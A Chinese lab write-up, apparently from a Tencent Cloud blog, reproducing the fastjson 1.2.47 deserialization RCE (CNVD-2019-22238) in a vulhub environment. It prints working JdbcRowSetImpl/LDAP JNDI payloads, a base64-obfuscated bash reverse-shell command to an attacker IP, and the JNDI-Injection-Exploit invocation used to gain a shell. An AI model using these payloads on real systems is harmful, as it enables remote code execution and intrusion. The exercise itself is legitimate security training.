前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
工具
TVP
发布
社区首页 >专栏 >CNVD-2019-22238 fastjson反序列化漏洞

CNVD-2019-22238 fastjson反序列化漏洞

原创
作者头像
用户8478947
发布2022-12-29 16:53:36
3890
发布2022-12-29 16:53:36
举报
文章被收录于专栏:安全学习安全学习

漏洞简介

事项

描述

漏洞概述

fastjson于1.2.24版本后增加了反序列化白名单,而在1.2.48以前的版本中,攻击者可以利用特殊构造的json字符串绕过白名单检测,成功执行任意命令。

影响范围

1.2.48以前的版本

漏洞编号

CNVD-2019-22238

漏洞搭建

这里使用vulhub的fastjson/1.2.47-rce进行复现。

image-20221224165619946
image-20221224165619946

访问http://192.168.146.167:64725/

image-20221224165706393
image-20221224165706393

漏洞复现

使用工具进行检测

image-20221224170213027
image-20221224170213027

发现dnslog有数据,说明存在漏洞。

image-20221224170244705
image-20221224170244705

查看对应的payload

image-20221224170305910
image-20221224170305910
代码语言:javascript
复制
 [6]{    "a": {        "@type": "java.lang.Class",        "val": "com.sun.rowset.JdbcRowSetImpl"    },    "b": {        "@type": "com.sun.rowset.JdbcRowSetImpl",        "dataSourceName": "ldap://test6.j6i2jc.dnslog.cn/Exploit",        "autoCommit": true    }}

然后再进行抓包,添入payload,手工再测一遍。发现确实存在。

image-20221224170447427
image-20221224170447427

验证有漏洞之后,就尝试反弹shell。这里使用JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar进行进一步的漏洞利用。

代码语言:javascript
复制
 反弹的的ip和端口是192.168.146.161和10000
 bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjE0Ni4xNjEvMTAwMDAgMD4mMQ==}|{base64,-d}|{bash,-i}

执行以下命令,进行反弹shell。

代码语言:javascript
复制
 java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjE0Ni4xNjEvMTAwMDAgMD4mMQ==}|{base64,-d}|{bash,-i}"

由于不知道对方java的版本,所以就一个个试。

image-20221224171245209
image-20221224171245209

然后发现漏洞利用成功

代码语言:javascript
复制
 {    "a": {        "@type": "java.lang.Class",        "val": "com.sun.rowset.JdbcRowSetImpl"    },    "b": {        "@type": "com.sun.rowset.JdbcRowSetImpl",        "dataSourceName": "ldap://192.168.146.161:1389/5jdmca",        "autoCommit": true    }}
image-20221224171322082
image-20221224171322082

成功反弹了shell。

image-20221224171406904
image-20221224171406904

进入tmp目录下,成功拿到flag。

原创声明:本文系作者授权腾讯云开发者社区发表,未经许可,不得转载。

如有侵权,请联系 cloudcommunity@tencent.com 删除。

原创声明:本文系作者授权腾讯云开发者社区发表,未经许可,不得转载。

如有侵权,请联系 cloudcommunity@tencent.com 删除。

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
目录
  • 漏洞简介
  • 漏洞搭建
  • 漏洞复现
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档